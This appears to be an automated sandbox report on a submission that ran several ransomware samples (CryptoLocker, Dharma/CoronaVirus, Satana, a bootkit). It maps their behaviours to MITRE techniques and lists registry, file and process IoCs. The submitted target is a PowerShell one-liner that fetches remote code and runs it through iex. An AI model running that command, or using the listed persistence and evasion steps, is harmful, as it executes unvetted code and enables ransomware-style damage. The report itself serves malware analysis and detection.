cryptolocker | hxxp://irm hxxps://massgrave[.]dev/get | iex

Resubmissions

22-12-2024 03:02

241222-djhjss1ke1 4

22-12-2024 02:52

241222-dc3amazrgw 10

22-12-2024 02:49

241222-dbf11a1kbm 3

Analysis

max time kernel
477s
max time network
478s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
22-12-2024 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://irm https://massgrave.dev/get | iex

Score

10^/10

cryptolocker dharma bootkit credential_access defense_evasion discovery evasion execution impact lateral_movement motw persistence phishing privilege_escalation ransomware stealer

Malware Config

Signatures

CryptoLocker
Ransomware family with multiple variants.
ransomware cryptolocker
Cryptolocker family
cryptolocker
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
5096	net.exe
5204	net1.exe

Renames multiple (604) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
324	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2092	attrib.exe

Sets service image path in registry 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tybsidtuiyqqvxf\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\tybsidtuiyqqvxf.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\biwugfduuoenniqq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\biwugfduuoenniqq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uleoyaguuvjxizpkd\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\uleoyaguuvjxizpkd.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dvzqoczcgmxvsk\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\dvzqoczcgmxvsk.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ppgvjkmofeiefmh\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\ppgvjkmofeiefmh.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\abgpbfpoedngzdg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\abgpbfpoedngzdg.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\ac\\mssqlaq.sys"	mssql.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe

Executes dropped EXE 11 IoCs

pid	Process
5136	GSAutoClicker.exe
5444	{34184A33-0407-212E-3320-09040709E2C2}.exe
2196	{34184A33-0407-212E-3320-09040709E2C2}.exe
1384	nc123.exe
4688	mssql.exe
1832	mssql2.exe
1108	SearchHost.exe
12496	msedge.exe
13364	msedge.exe
4472	msedge.exe
5352	msedge.exe

Impair Defenses: Safe Mode Boot 1 TTPs 12 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\biwugfduuoenniqq.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dvzqoczcgmxvsk.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DVZQOCZCGMXVSK.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\PPGVJKMOFEIEFMH.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ABGPBFPOEDNGZDG.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tybsidtuiyqqvxf.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\TYBSIDTUIYQQVXF.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\BIWUGFDUUOENNIQQ.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\uleoyaguuvjxizpkd.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ULEOYAGUUVJXIZPKD.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ppgvjkmofeiefmh.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\abgpbfpoedngzdg.sys	mssql.exe

Loads dropped DLL 4 IoCs

pid	Process
12496	msedge.exe
13364	msedge.exe
4472	msedge.exe
5352	msedge.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe"	{34184A33-0407-212E-3320-09040709E2C2}.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe"	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	CoronaVirus.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-4249425805-3408538557-1766626484-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-4249425805-3408538557-1766626484-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	CoronaVirus.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
305	raw.githubusercontent.com
150	raw.githubusercontent.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
166	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	Seftad.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001900000002ad2b-821.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\CoronaVirus.exe	CoronaVirus.exe
File created	C:\Windows\System32\Info.hta	CoronaVirus.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 12148 set thread context of 14888	12148	Satana.exe	229

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\OrientationControlCone.png	CoronaVirus.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\lv.pak.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\main.css.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\System.RunTime.Serialization.Resources.dll	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\Locales\devtools\zh-CN.pak.DATA.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PaintSmallTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\Locales\fr.pak.DATA.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.Speech.resources.dll	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.Claims.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.targetsize-256_altform-unplated.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-256.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiItalic.ttf.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\130\Shared\msasxpress.dll	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\MLModels\nexturl.ort.DATA.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ExcelFloatieXLEditTextModel.bin.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\cs_get.svg	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\GRINTL32.DLL	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmotiondetect_plugin.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstaller.sccd	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant\System.Windows.Forms.resources.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\System.Xaml.resources.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\ui-strings.js.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko\UIAutomationClient.resources.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\PresentationUI.resources.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close-2.svg	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ChakraCore.Debugger.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_12008.1001.1.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\ProgressControl.xaml	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libcaca_plugin.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\TestResults.Tests.ps1	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL016.XML.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-64_altform-unplated.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcp140.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsNotepad_10.2102.13.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\NotepadAppList.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-400_contrast-white.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80_altform-lightunplated_contrast-white.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\GroupedList\GroupFooter.base.js	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.reportviewer.winforms.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\DetailsList\DetailsList.js	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\MEIPreload\preloaded_data.pb.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ul-oob.xrm-ms	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_neutral_split.scale-140_8wekyb3d8bbwe\AppxBlockMap.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-150_contrast-white.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-pl.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OSFPROXY.DLL.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line.cur.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.lt-lt.dll.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\ui-strings.js.id-79D4D0F5.[[email protected]].ncov	CoronaVirus.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5432	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\GSAutoClicker.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
